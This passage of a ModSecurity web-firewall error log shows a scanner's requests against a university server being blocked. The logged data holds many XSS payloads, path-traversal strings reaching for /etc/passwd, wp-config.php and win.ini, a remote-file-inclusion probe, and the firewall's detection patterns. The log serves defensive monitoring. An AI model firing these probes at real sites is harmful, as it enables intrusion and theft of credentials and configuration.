"PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/navis-documentcloud/js/window.php"] [unique_id "ZO15-cCo-f0AAApbUTAAAAAh"]
[Tue Aug 29 11:54:22.909739 2023] [:error] [pid 2656] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:page: </script>\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php"] [unique_id "ZO15-sCo-f0AAApgAzEAAAAH"]
[Tue Aug 29 11:54:23.592736 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/sap/bc/BSp/sap/menu/fameset.htm"] [unique_id "ZO15-8Co-f0AAApXgcoAAAAU"]
[Tue Aug 29 11:54:25.189275 2023] [:error] [pid 2661] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lp-dismiss-notice. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: xxx<img found within ARGS:lp-dismiss-notice: xxx<img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16AcCo-f0AAApl9@4AAAAo"]
[Tue Aug 29 11:54:27.027998 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:q: <svg/onload=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/addons/"] [unique_id "ZO16A8Co-f0AAAqWwVAAAAAl"]
[Tue Aug 29 11:54:27.155245 2023] [:error] [pid 2657] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAAph8w0AAAAj"]
[Tue Aug 29 11:54:27.578254 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAAqWwVMAAAAl"]
[Tue Aug 29 11:54:29.798968 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:v. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:v: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/hero-maps-pro/views/dashboard/index.php"] [unique_id "ZO16BcCo-f0AAApbUUgAAAAh"]
[Tue Aug 29 11:54:31.551333 2023] [:error] [pid 2717] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x5c found within ARGS:what: {\\x22call_action\\x22:\\x22x\\x22,\\x22more_data\\x22:\\x22\\x5cu003cscript>alert(document.domain)\\x5cu003c/script>\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16B8Co-f0AAAqdblcAAAAw"]
[Tue Aug 29 11:54:31.728183 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><img src onerror=alert(document.domain) x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/members-list/admin/view/user.php"] [unique_id "ZO16B8Co-f0AAApXgfAAAAAU"]
[Tue Aug 29 11:54:32.705535 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:filename: filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php"] [unique_id "ZO16CMCo-f0AAAqeFOkAAAAx"]
[Tue Aug 29 11:54:33.594542 2023] [:error] [pid 2656] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16CcCo-f0AAApgA0EAAAAH"]
[Tue Aug 29 11:54:34.603334 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:var_url: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/ecrire/"] [unique_id "ZO16CsCo-f0AAAqSwi8AAAAN"]
[Tue Aug 29 11:54:35.673639 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16C8Co-f0AAAqUB2oAAAAb"]
[Tue Aug 29 11:54:35.675515 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/adminimize/adminimize_page.php"] [unique_id "ZO16C8Co-f0AAAqWwWoAAAAl"]
[Tue Aug 29 11:54:35.681859 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stack. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stack: \\x0a<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/__nuxt_error"] [unique_id "ZO16C8Co-f0AAAofnEYAAAAX"]
[Tue Aug 29 11:54:36.578079 2023] [:error] [pid 2711] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:settings[41]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:settings[41]: <body onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16DMCo-f0AAAqXyP4AAAAq"]
[Tue Aug 29 11:54:38.237561 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16DsCo-f0AAAqWwXAAAAAl"]
[Tue Aug 29 11:54:39.529225 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "ZO16D8Co-f0AAAor7xsAAAAk"]
[Tue Aug 29 11:54:40.319013 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_8f66ab1d297e01ba5a0ba66947b86641a9909af6"): Internal error [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "ZO16D8Co-f0AAAor7xsAAAAk"]
[Tue Aug 29 11:54:40.539795 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HImbmoU7CZyArPbLLDsM9Y5')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO16EMCo-f0AAAqY56MAAAAr"]
[Tue Aug 29 11:54:41.558241 2023] [:error] [pid 2661] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16EcCo-f0AAApl@B4AAAAo"]
[Tue Aug 29 11:54:41.632838 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS_NAMES:javascript:alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS_NAMES:javascript:alert(document.domain): javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "mbkm.unla.ac.id"] [uri "/help/english/index.html"] [unique_id "ZO16EcCo-f0AAApa-FsAAAAg"]
[Tue Aug 29 11:54:44.581285 2023] [:error] [pid 2661] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain): a' type= 'text' autofocus onfocus='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/OneView/view/center"] [unique_id "ZO16FMCo-f0AAApl@CcAAAAo"]
[Tue Aug 29 11:54:46.662784 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16FsCo-f0AAApa-G0AAAAg"]
[Tue Aug 29 11:54:47.603919 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:operatorlocale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:operatorlocale: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/index.jsp"] [unique_id "ZO16F8Co-f0AAAqhN9sAAAAE"]
[Tue Aug 29 11:54:50.561069 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO16GsCo-f0AAApHRZQAAAAP"]
[Tue Aug 29 11:54:50.587987 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/raygun4wp/sendtesterror.php"] [unique_id "ZO16GsCo-f0AAApbUXkAAAAh"]
[Tue Aug 29 11:54:50.674899 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/source/loggin/page_log_dwn_file.hsp"] [unique_id "ZO16GsCo-f0AAAqUB5YAAAAb"]
[Tue Aug 29 11:54:52.555245 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:xing-url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:xing-url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php"] [unique_id "ZO16HMCo-f0AAAoz79sAAAAS"]
[Tue Aug 29 11:54:52.671077 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:formId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:formId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/tidio-form/popup-insert-help.php"] [unique_id "ZO16HMCo-f0AAAqWwacAAAAl"]
[Tue Aug 29 11:54:54.099707 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname 